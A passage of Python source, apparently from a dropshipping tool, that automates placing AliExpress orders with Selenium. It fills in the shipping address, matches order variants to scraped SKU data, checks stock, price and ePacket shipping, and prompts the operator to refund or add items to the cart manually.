country, state, city, zip_, address1, address2, name, province = (country_code_dict[shipping_address['country_code']] , states.get(shipping_address['province_code']) if shipping_address['country_code'] == "US" else shipping_address['province'] , aliexpress_dialog_box_adjust_city(shipping_address['city'].strip().capitalize()) , shipping_address['zip'] , shipping_address['address1'] , shipping_address['address2'] , shipping_address['name'] , shipping_address['province'])
tp(lambda:lmap(lambda i: print("%s: %s"%(i, eval(i))), ["country", "state", "city", "zip_", "address1", "address2", "name", "province"]))
#
self_.ss.get("https://ilogisticsaddress.aliexpress.com/addressList.htm").tp(lambda:ifelseget(lambda:"selectedAddressId" in self_.ss.current_url,lambda:None,lambda:self_.ss.fcns("sa-edit").click()))
lmap(lambda i:i.click(),[i for i in self_.ss.fcns("sa-country")[0].find_elements_by_tag_name("option") if i.text == country])
for i in self_.ss.fcns("sa-country")[0].find_elements_by_tag_name("option"):
if i.text == country:
i.click()
time.sleep(1)
break
for i in self_.ss.fcns("sa-province-wrapper")[0].find_elements_by_tag_name("option"):
if i.text == state:
i.click()
time.sleep(1)
break
for i in self_.ss.fcns("sa-city-wrapper")[0].find_elements_by_tag_name("option"):
if i.text == city:
i.click()
time.sleep(1)
break
self_.ss.bat().fn("contactPerson").send_keys(name).sp(1).fn("address").send_keys(address1).sp(1).fn("address2").send_keys(address2)
self_.ss.sp(1).fn("zip").send_keys(zip_).sp(1).fn("mobileNo").send_keys(Shop()(x_shop).Business_Phone_Number).sp(1)
self_.ss.fn("isDefault").click().fcns("sa-confirm").click()
shipping_address_ = get_random_address(homepath("~/tavern/tavern/soda/dls")).png()
self_.ss.save_screenshot(shipping_address_)
OSA.log("The projected count of items in this order is %s"%(len(self_.orders)))
for order in self_.orders:
# Exec('# Get Self Url\nself_.url = InceptedProduct().RScan(id=order.product_id).ali_url\nself_.order = order\nself_.saved_data_1 = [{"shipping_address":address_string_from_dict(self_.real_order.shipping_address),"idx":idx,"total quantity":i["quantity"],"title":i["title"],"variant_title":i["variant_title"],"fulfilled quantity":i["quantity"] if i["fulfillment_status"] == "fulfilled" else 0, "ali_url":Get(Product,id=Get(Lineitem,id=i["id"]).product_id).ali_url,"sku":i["sku"]} for idx,i in enum(self_.real_order.line_items)]\n# Get DATA\nx = Aliexpress_Products().get_product_data(url=InceptedProduct().RScan(id=self_.order.product_id).ali_url)\nx_saved = x\n# Get Important VARIABLES\n\n\nshipping_cost = ShippingCost().get_shipping_cost(x.shipping,x_shop)\ndata2 = or_list(lambda: AD(json.loads(findall(str(x.data),1,\'data: ({"actionModule.*),\'))).skuModule.skuPriceList, lambda: lmap(AD,json.loads(findall(str(x.data),1,"var skuProducts=(.*);"))))\nsku_list = or_list(lambda: AD(json.loads(findall(str(x.data),1,\'data: ({"actionModule.*),\'))).skuModule.productSKUPropertyList, lambda: lmap(AD,json.loads(findall(str(x.data),1,"var skuProducts=(.*);"))))\nvariants = lmap(lambda i: AD(sku = Join("|",Split(", ", i.skuPropIds)), inventory_quantity = i.skuVal.availQuantity, price = or_list(lambda: flt(i.skuVal.actSkuCalPrice) + shipping_cost, lambda: flt(i.skuVal.skuCalPrice) + shipping_cost)), data2)\nproduct = Get(Product,id=self_.order.product_id)',globals(),locals())
# Get Self Url
self_.url = InceptedProduct().RScan(id=order.product_id).ali_url
self_.order = order
self_.saved_data_1 = [{"shipping_address":address_string_from_dict(self_.real_order.shipping_address),"idx":idx,"total quantity":i["quantity"],"title":i["title"],"variant_title":i["variant_title"],"fulfilled quantity":i["quantity"] if i["fulfillment_status"] == "fulfilled" else 0, "ali_url":Get(Product,id=Get(Lineitem,id=i["id"]).product_id).ali_url,"sku":i["sku"]} for idx,i in enum(self_.real_order.line_items)]
# Get DATA
x = Aliexpress_Products().get_product_data(url=InceptedProduct().RScan(id=self_.order.product_id).ali_url)
x_saved = x
# Get Important VARIABLES
to_continue = False
# Not Found
if x.y == "Not Found":
if("Refund"==OSA.log("This product is not found.\n\nRefund or Manually Add Item To Cart?\n[%s %s %s]"%(((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))),buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
#here, continue if it's not found because the rest of the details cannot be calculated
print("to continue: %s" % (to_continue))
if to_continue == True: continue
shipping_cost = ShippingCost().get_shipping_cost(x.shipping,x_shop)
data2 = or_list(lambda: AD(json.loads(findall(str(x.data),1,'data: ({"actionModule.*),'))).skuModule.skuPriceList, lambda: lmap(AD,json.loads(findall(str(x.data),1,"var skuProducts=(.*);"))))
sku_list = or_list(lambda: AD(json.loads(findall(str(x.data),1,'data: ({"actionModule.*),'))).skuModule.productSKUPropertyList, lambda: lmap(AD,json.loads(findall(str(x.data),1,"var skuProducts=(.*);"))))
variants = lmap(lambda i: AD(sku = Join("|",Split(", ", i.skuPropIds)), inventory_quantity = i.skuVal.availQuantity, price = or_list(lambda: flt(i.skuVal.actSkuCalPrice) + shipping_cost, lambda: flt(i.skuVal.skuCalPrice) + shipping_cost)), data2)
product = Get(Product,id=self_.order.product_id)
# Exec('to_continue = False \n# Not Found\nif x.y == "Not Found":\n if("Refund"==OSA.log("This product is not found.\\n\\nRefund or Manually Add Item To Cart?",buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n to_continue = True\n# A Variant Not Found\nif Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") not in key("sku", variants):\n if("Refund"==OSA.log("This variant with title: %s at the url: %s is not found.\\n\\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url),buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n to_continue = True\n# Out Of Stock\nif keyby(lambda i:Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") == i.sku, variants)[0].inventory_quantity == 0:\n if("Refund"==OSA.log("This variant with title: %s at the url: %s is out of stock.\\n\\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url),buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n to_continue = True\n# Low Q\nif keyby(lambda i:Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") == i.sku, variants)[0].inventory_quantity < self_.order.quantity:\n if("Refund"==OSA.log("This variant with title: %s at the url: %s does not have the amount of inventory that the order requires.\\n\\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url),buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n to_continue = True\n# High Price\nif keyby(lambda i:Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") == i.sku, variants)[0].price > self_.order.price:\n if("Refund"==OSA.log("This variant with title: %s at the url: %s is priced over the price that it sold for of %s.\\n\\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url,self_.order.price),buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n to_continue = True\n# Country Not Supported\nif self_.order.shipping_address.get("country_code") not in ["US"]:\n if("Refund"==OSA.log("This order is shipping to a country outside of 
            # the United States. Refund or Manually Add Item To Cart?",buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n        (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n        to_continue = True\n# Shipping Problem\nif x.y == "No ePacket":\n    if("Refund"==OSA.log("This product does not have ePacket Shipping.\\n\\nRefund or Manually Add Item To Cart?",buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n        (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n        to_continue = True\n# Order Note\nif self_.real_order.note:\n    if("Refund"==OSA.log("This order has the note:\\n%s\\n\\nRefund or Manually Add Item To Cart?"%(self_.real_order.note),buttons=["Refund","Manually Add Item To Cart"],tp=False)):\n        (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))\n        to_continue = True',globals(),locals())
#continue and refund/manually order another boxes
# Country Not Supported
# if self_.order.shipping_address.get("country_code") not in ["US"]:
# if("Refund"==OSA.log("This order is shipping to a country outside of the United States. Refund or Manually Add Item To Cart?",buttons=["Refund","Manually Add Item To Cart"],tp=False)):
# (OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
# to_continue = True
# else:
# OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
# setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
# self_.manually_setted = True
# to_continue = True
# self_.fulfilled_line_items.append(order)
# OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# A Variant Not Found
if Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") not in key("sku", variants):
if("Refund"==OSA.log("This variant with variant title: %s at the url: %s is not found.\n\nRefund or Manually Add Item To Cart?"%(self_.order.variant_title,InceptedProduct().RScan(id=self_.order.product_id).ali_url),buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# Out Of Stock
if keyby(lambda i:Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") == i.sku, variants)[0].inventory_quantity == 0:
if("Refund"==OSA.log("This variant with title: %s at the url: %s is out of stock.\n\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url),buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# Low Q
if keyby(lambda i:Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") == i.sku, variants)[0].inventory_quantity < self_.order.quantity:
if("Refund"==OSA.log("This variant with title: %s at the url: %s does not have the amount of inventory that the order requires.\n\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url),buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# High Price
if keyby(lambda i:Get(UniqueProductIdentifier,product_id=product.id,shop=self_.order.shop,y=self_.order.sku).x.replace("|",",") == i.sku, variants)[0].price > self_.order.price:
if("Refund"==OSA.log("This variant with title: %s at the url: %s is priced over the price that it sold for of %s.\n\nRefund or Manually Add Item To Cart?"%(self_.order.title,InceptedProduct().RScan(id=self_.order.product_id).ali_url,self_.order.price),buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# Shipping Problem
if x.y == "No ePacket":
if("Refund"==OSA.log("This product does not have ePacket Shipping.\n\nRefund or Manually Add Item To Cart?",buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# Order Note
if self_.real_order.note:
if("Refund"==OSA.log("This order has the note:\n%s\n\nRefund or Manually Add Item To Cart?"%(self_.real_order.note),buttons=["Refund","Manually Add Item To Cart"],tp=False)):
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
print("to continue: %s" % (to_continue))
if to_continue == True: continue
# 'x = AD(data=requests.get("https://www.aliexpress.com/item/32972321655.html?spm=a2g0o.productlist.0.0.502be3db6PIFg5&algo_pvid=6e6ab535-2674-4ada-badb-f307fa42baaf&algo_expid=6e6ab535-2674-4ada-badb-f307fa42baaf-1&btsid=2e90407e-a1e1-4487-a2f2-a56ac864f81f&ws_ab_test=searchweb0_0,searchweb201602_7,searchweb201603_53").text)\nshipping_cost = 1\ndata2 = or_list(lambda: AD(json.loads(findall(str(x.data),1,\'data: ({"actionModule.*),\'))).skuModule.skuPriceList, lambda: lmap(AD,json.loads(findall(str(x.data),1,"var skuProducts=(.*);"))))\nsku_list = or_list(lambda: AD(json.loads(findall(str(x.data),1,\'data: ({"actionModule.*),\'))).skuModule.productSKUPropertyList, lambda: lmap(AD,json.loads(findall(str(x.data),1,"var skuProducts=(.*);"))))\nvariants = lmap(lambda i: AD(sku = Join("|",Split(", ", i.skuPropIds)), inventory_quantity = i.skuVal.availQuantity, price = or_list(lambda: flt(i.skuVal.actSkuCalPrice) + 1, lambda: flt(i.skuVal.skuCalPrice) + 1)), data2)\n# SKU = Get(UniqueProductIdentifier,product_id=self_.order.product_id,shop=self_.order.shop,y=self_.order.sku).x\nSKU = "1583|6144"\nif SKU != "":\n SKU_OPTIONS = lmap(int, Split("|", SKU))\n # for idx, i in enum(SKU_OPTIONS):\n # self_.ss.fid("sku-%s-%s"%((idx+1), i)).click().sp(2)\n r = list(enum(SKU_OPTIONS))\n sku_info_list = []\n for idx, a in r:\n options = keyby(lambda i:i.order == idx+1, sku_list)\n option = options[0]\n for idx2, b in enum(option.skuPropertyValues):\n if b.propertyValueId == a:\n data = AD(option_list_data=None,sku=None,title=None,image_url=None)\n data.option_list_data = (idx, idx2)\n sku_info_list.append(data)\n for info in sku_info_list:\n a, b = info.option_list_data\n sku = info.sku\n title = info.title\n image_url = info.image_url\n entries = self_.ss.fcns("sku-property-list")\n entry = entries[a]\n entry_values = entry.find_elements_by_class_name("sku-property-item")\n entry_value = entry_values[b]\n data.sku = sku\n text,image_url = None, None\n if entry_value.find_elements_by_class_name("sku-property-color"):\n text = entry_value.find_elements_by_class_name("sku-property-color")[0].find_elements_by_tag_name("span")[0].get_attribute("title")\n image_url = None\n data.update(title = text, image_url = image_url)\n if entry_value.find_elements_by_class_name("sku-property-image"):\n text = entry_value.find_elements_by_class_name("sku-property-image")[0].find_elements_by_tag_name("img")[0].get_attribute("title")\n text = entry_value.find_elements_by_tag_name("img")[0].get_attribute("title")\n image_url = entry_value.find_elements_by_class_name("sku-property-image")[0].find_elements_by_tag_name("img")[0].get_attribute("src")\n image_url = entry_value.find_elements_by_tag_name("img")[0].get_attribute("src")\n data.update(title = text, image_url = image_url)\n if entry_value.find_elements_by_class_name("sku-property-text"):\n text = entry_value.find_elements_by_class_name("sku-property-text")[0].text\n image_url = None\n data.update(title = text, image_url = image_url)\n OSA.log("option list data: %s, %s\\nsku: %s\\ntitle: %s\\nimage_url: %s\\n\\nPlease check that the info is correct."%(a, b, data.sku, data.title, data.image_url))\n if "selected" not in entry_value.get_attribute("class"):\n entry_value.click()\n sp(2)'
# Get URL and click options
self_.ss.get(self_.url)
if self_.order.sku == "Auto":
# Auto
OSA.log("Sku is auto. Please fill it out.",tp=False)
else:
SKU = Get(UniqueProductIdentifier,product_id=self_.order.product_id,shop=self_.order.shop,y=self_.order.sku).x
if SKU != "":
SKU_OPTIONS = lmap(int, Split("|", SKU))
# for idx, i in enum(SKU_OPTIONS):
# self_.ss.fid("sku-%s-%s"%((idx+1), i)).click().sp(2)
r = list(enum(SKU_OPTIONS))
sku_info_list = []
for idx, a in r:
sku_list_ = key("skuPropertyValues",sku_list)[idx]
for idx_v, i in enum(sku_list):
i.order_x = idx_v + 1
options = keyby(lambda i:i.order_x == idx+1, sku_list)
option = options[0]
for idx2, b in enum(sku_list_):
if b.propertyValueId == a:
data = AD(option_list_data=None,sku=None,title=None,image_url=None)
print(idx, idx2)
data.option_list_data = (idx, idx2)
sku_info_list.append(data)
for info in sku_info_list:
a, b = info.option_list_data
sku = info.sku
title = info.title
image_url = info.image_url
entries = self_.ss.fcns("sku-property-list")
entry = entries[a]
entry_values = entry.find_elements_by_class_name("sku-property-item")
entry_value = entry_values[b]
data.sku = sku
text,image_url = None, None
if entry_value.find_elements_by_class_name("sku-property-color"):
text = entry_value.find_elements_by_class_name("sku-property-color")[0].find_elements_by_tag_name("span")[0].get_attribute("title")
image_url = None
data.update(title = text, image_url = image_url)
if entry_value.find_elements_by_class_name("sku-property-image"):
text = entry_value.find_elements_by_class_name("sku-property-image")[0].find_elements_by_tag_name("img")[0].get_attribute("title")
text = entry_value.find_elements_by_tag_name("img")[0].get_attribute("title")
image_url = entry_value.find_elements_by_class_name("sku-property-image")[0].find_elements_by_tag_name("img")[0].get_attribute("src")
image_url = entry_value.find_elements_by_tag_name("img")[0].get_attribute("src")
data.update(title = text, image_url = image_url)
if entry_value.find_elements_by_class_name("sku-property-text"):
text = entry_value.find_elements_by_class_name("sku-property-text")[0].text
image_url = None
data.update(title = text, image_url = image_url)
OSA.log("option list data: %s, %s\nsku: %s\ntitle: %s\nimage_url: %s\n\nPlease check that the info is correct."%(a, b, data.sku, data.title, data.image_url))
OSA.log("Entry value class: %s" % (entry_value.get_attribute("class")))
if "selected" not in entry_value.get_attribute("class"):
entry_value.click()
sp(2)
OSA.log("Checking all options could be selected")
entries = self_.ss.fcns("sku-property-list")
for idx, a in enum(entries):
selected = a.find_elements_by_class_name("selected")
if selected == []:
OSA.log("Unable to select element for option list #%s"%(idx+1))
# continue, and either refund or manually order the remaining items
to_continue = False
# ADDINVENTORY
if 0 in lmap(lambda i: self_.ss.fcns("next-after").click().sp(1), lrange(self_.order.quantity - 1)):
(OSA.log("Could not add everything to inventory. This is an error that should not happen."))
option = OSA.log("Do you want to manually find another one to add it to the cart or do you want to refund the quantity that could not be fulfilled?",buttons=["Refund","Manually Add Items To Cart"])
if option == "Refund":
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# CHECKINVENTORYEQUAL
if or_list(lambda:int(self_.ss.fcn("product-number-picker",4).find_elements_by_tag_name("input")[0].get_attribute("value")),lambda:int(self_.ss.fcn("p-quantity-input",4).get_attribute("value"))) != self_.order.quantity:
(OSA.log("Current quantity to add to cart is not equal to the order quantity. This is an error that should not happen."))
option = OSA.log("Do you want to manually find another one to add it to the cart or do you want to refund the quantity that could not be added to the cart?",buttons=["Refund","Manually Add Items To Cart"])
if option == "Refund":
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
# SHIPPING BUTTON CHECK
# self_.ss.fid("j-shipping-company").click().fcn("s-company-title", _time=30).sp(2)
self_.ss.ffss("span","ae_button_type","detail_change_freight_click",4).click().sp(2)
if Shop()(x_shop).Allow_Additional_Shipping_Methods == False:
if "ePacket" not in sud("text",self_.ss.fcns("service-name")):
# if tryprocess(lambda: self_.ss.ffst("td","ePacket")) == 0:
(OSA.log("No ePacket button is available. This is an error that should not happen."))
option = OSA.log("Do you want to manually find another one with ePacket to add it to the cart or do you want to refund the items without ePacket?",buttons=["Refund","Manually Add Items To Cart"])
if option == "Refund":
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
if to_continue == True: continue
# click the shipping option
shipping_company = ShippingCost().get_shipping_company(x.shipping,x_shop)
# self_.ss.ffst("td", shipping_company).click().ffs("input","value","OK").click().sp(2)
self_.ss.jcns("service-name","click",{"text":shipping_company}).sp(2).jtns("button","click",{"ae_button_type":"detail_shipping_panel_apply"}).sp(2)
# Set TrackMethod and Price
# setattrs(self_.order, "ali_tracking_method", shipping_company, "ali_price", (self_.order.quantity *float( Join(".",findall(self_.ss.fcn("product-price-value").text,"\d+"))))+(float(Join(".",findall(self_.ss.fcn("product-shipping-price").text,"\d+")))) )
# add shipping price later
to_continue = False
# add to cart action and check it
click_add_to_cart_action = tryprocess(lambda: self_.ss.fcn("addcart").click().sp(5))
if click_add_to_cart_action == 0:
(OSA.log("Could not add this product to cart. This is an error that should not happen. Exitting."))
option = OSA.log("Do you want to manually find another one where it can add it to the cart or do you want to refund the item that can't add to cart?",buttons=["Refund","Manually Add Items To Cart"])
if option == "Refund":
(OSA.log("Please refund the %s %s at %s"%((self_.order.quantity),("%s(%s)"%(self_.order.title, self_.order.variant_title)),("%s/orders/%s"%(Get(Shop,shop_abbreviation=self_.order.shop).Administrative_Url,self_.real_order.id)))))
to_continue = True
else:
OSA.log("Okay you have manually added it to the cart. Please enter the shipping company and the price of the item without including it's shipping in the following screens",tp=False)
setattrs(self_.order, "ali_tracking_method", OSA.log("Shipping company?"), "ali_price", float(OSA.log("Ali Price of the item without including the shipping (it will be calculated later)")) )
self_.manually_setted = True
to_continue = True
self_.fulfilled_line_items.append(order)
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
if to_continue == True: continue
if getattr(self,"manually_setted",False) == False:
self_.ss.fcns("next-dialog-close-icon").click().sp(2)
setattrs(self_.order, "ali_tracking_method", shipping_company, "ali_price", (self_.order.quantity *float( Join(".",findall(self_.ss.fcn("product-price-value").text,"\d+")))) )
else:
OSA.log("Affirming self order amounts:\nTracking:%s\nAli Price:%s" % (self_.order.ali_tracking_method,self_.order.ali_price))
OSA.log("order price: %s\nali_order_price: %s\n\nPlease check the order price to the ali order price. This is not including the shipping price."%(self_.order.price, self_.order.ali_price))
ifdo(lambda:click_add_to_cart_action == 1,lambda:self_.fulfilled_line_items.append(self_.order))
#
self_.ss.get("https://shoppingcart.aliexpress.com/shopcart/shopcartDetail.htm").zoom_out(5)
if self_.fulfilled_line_items == []:
# if a 1 item order had all items refunded
self_()
return
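# Select everything in the cart and proceed to checkout; the chained helper calls tick the
# cart checkbox, click the checkout button and, if an order pop-up iframe appears, switch
# it to the full-page view before continuing.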
